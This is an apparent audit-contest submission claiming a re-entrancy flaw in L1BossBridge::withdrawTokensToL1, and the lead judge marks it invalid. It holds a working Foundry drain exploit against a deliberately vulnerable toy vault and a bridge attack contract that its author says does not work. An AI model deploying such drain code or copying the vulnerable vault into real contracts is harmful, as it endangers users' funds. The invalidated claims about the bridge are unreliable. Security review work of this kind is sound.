Beginner Friendly, Foundry, Bridge
100 EXP
Submission Details
Severity: high
Invalid

`L1BossBridge::withdrawTokensToL1` is not guarded by nonReentrant, leaving the vault's funds exposed to re-entrancy attacks

PoC for the missing nonReentrant guard on withdrawTokensToL1

Summary

The L1BossBridge::withdrawTokensToL1 function is not protected by the nonReentrant modifier.

Vulnerability Details

The L1BossBridge contract inherits OpenZeppelin's ReentrancyGuard, but the nonReentrant modifier it provides is not applied to the sensitive functions, in particular not to the withdrawal function, which performs an external call.
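To show what the inherited but unused guard actually does, here is an added Foundry test (example code, not the bridge's own contracts). It uses a hypothetical ether vault that pays out through a low-level call before updating state, standing in for the bridge's vault and for the external call made by sendToL1 (the bridge's real path, an ERC20 transferFrom from the vault, is not modeled here), plus a simplified status-flag guard standing in for OpenZeppelin's ReentrancyGuard. It assumes a Foundry project with forge-std installed. The first test drains the unguarded vault by re-entering withdraw() from receive(); the second shows the same attack reverting once nonReentrant is applied to the entry point.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol"; // assumes a Foundry project with forge-std installed

// Simplified stand-in for OpenZeppelin's ReentrancyGuard: a status flag set on entry
// and cleared on exit, so a nested call into a guarded function reverts.
abstract contract Guard {
    uint256 private _status = 1;

    modifier nonReentrant() {
        require(_status == 1, "ReentrancyGuard: reentrant call");
        _status = 2;
        _;
        _status = 1;
    }
}

// Hypothetical vault (not the bridge's L1Vault): credits ether per depositor and pays
// out through a low-level call, the same kind of external call sendToL1 makes.
// The balance is zeroed only AFTER the call, which is what a re-entering callee abuses.
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function _withdraw() internal {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction first ...
        require(ok, "transfer failed");
        balances[msg.sender] = 0;                          // ... effect last
    }

    function withdraw() external virtual {
        _withdraw();
    }
}

// Same vault with the recommended modifier applied to the entry point.
contract GuardedVault is VulnerableVault, Guard {
    function withdraw() external override nonReentrant {
        _withdraw();
    }
}

// Attacker: deposits, withdraws, and re-enters withdraw() from receive() while the
// vault still holds funds and the attacker's credit has not yet been zeroed.
contract Attacker {
    VulnerableVault public target;
    uint256 public stake;

    constructor(VulnerableVault _target) { target = _target; }

    function attack() external payable {
        stake = msg.value;
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    receive() external payable {
        if (address(target).balance >= stake) {
            target.withdraw();
        }
    }
}

contract ReentrancyGuardTest is Test {
    // Unguarded: a 1 ether stake pulls out the victim's 3 ether as well.
    function testUnguardedVaultIsDrained() public {
        VulnerableVault vault = new VulnerableVault();
        vm.deal(address(this), 10 ether);
        vault.deposit{value: 3 ether}(); // a victim's deposit
        Attacker attacker = new Attacker(vault);
        attacker.attack{value: 1 ether}();
        assertEq(address(vault).balance, 0);
        assertEq(address(attacker).balance, 4 ether);
    }

    // Guarded: the nested withdraw() reverts inside receive(), the failed low-level
    // call makes the outer withdraw() revert, and the whole attack is rolled back.
    function testGuardedVaultRejectsReentry() public {
        GuardedVault vault = new GuardedVault();
        vm.deal(address(this), 10 ether);
        vault.deposit{value: 3 ether}();
        Attacker attacker = new Attacker(vault);
        vm.expectRevert(bytes("transfer failed"));
        attacker.attack{value: 1 ether}();
        assertEq(address(vault).balance, 3 ether);
    }
}
```

Run with `forge test -vv`. Note that the modifier only blocks the nested call; ordering the state update before the external call (checks-effects-interactions) is the fix that removes the window entirely, and the two are best used together.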

Impact

A malicious user could re-enter this function and drain all of the tokens from the vault.

High impact: funds are directly at stake.
High likelihood: re-entrancy attacks are among the main causes of drained contract funds, so the attack has to be considered highly plausible.

Tools Used

Forge
Code review
Slither

This is my first attempt at submitting a PoC, following your advice on previous First Flights. My week has been busy and I'm totally aware that this code isn't working, but this is where it was right before the submission deadline (I'm trying to improve :)

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal interfaces for the targeted function (signature as in Recommendations) and the bridged token.
interface IL1BossBridge { function withdrawTokensToL1(address to, uint256 amount, uint8 v, bytes32 r, bytes32 s) external; }
interface IERC20 { function balanceOf(address) external view returns (uint256); }

contract Attack {
    IL1BossBridge public bridge;
    IERC20 public token;
    address public vault; // L1Vault, whose token balance decides whether to re-enter
    uint256 private amount; uint8 private v; bytes32 private r; bytes32 private s; // signed withdrawal reused on re-entry

    constructor(address _bridge, address _token, address _vault) {
        bridge = IL1BossBridge(_bridge);
        token = IERC20(_token);
        vault = _vault;
    }

    // Fallback is called when withdrawTokensToL1 sends tokens to this contract.
    fallback() external payable {
        if (token.balanceOf(vault) >= 1e18) { // "1 token", assuming 18 decimals
            bridge.withdrawTokensToL1(address(this), amount, v, r, s);
        }
    }

    function attack(uint256 _amount, uint8 _v, bytes32 _r, bytes32 _s) external payable {
        (amount, v, r, s) = (_amount, _v, _r, _s);
        bridge.withdrawTokensToL1(address(this), amount, v, r, s);
    }
}

Recommendations

Add the nonReentrant modifier to the L1BossBridge::withdrawTokensToL1 function:

function withdrawTokensToL1(
address to,
uint256 amount,
uint8 v,
bytes32 r,
bytes32 s
- ) external {
+ ) external nonReentrant {
sendToL1(
v,
r,
s,
abi.encode(
address(token),
0, // value
abi.encodeCall(
IERC20.transferFrom,
(address(vault), to, amount)
)
)
);
}
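Review bot: the modifier is placed on withdrawTokensToL1, but the external call is made inside sendToL1, which this function only forwards to; if sendToL1 can be reached by any other path, guarding this wrapper alone leaves that path unguarded, so apply nonReentrant to sendToL1 (or to every entry point that reaches it). Since the contract already inherits ReentrancyGuard, as stated under Vulnerability Details, no new import is needed for `) external nonReentrant {`. The modifier blocks nested calls only; it does not replace ordering state updates before the external call.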
Updates

Lead Judging Commences

0xnevi Lead Judge
almost 2 years ago
Submission Judgement Published
Invalidated
Reason: Other
